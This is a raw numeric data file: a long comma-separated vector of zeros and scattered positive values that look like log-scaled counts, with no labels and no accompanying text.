0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 7.052721049232323, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 6.028278520230698, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 6.5998704992128365, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 2.1972245773362196, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 2.8398715690385097, 0.0, 3.649511027115099, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 4.969640753475787, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.030437921392435, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.9512437185814275, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 6.925410995016817, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 3.1354942159291497, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 6.984716320118266, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 7.694848072384611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 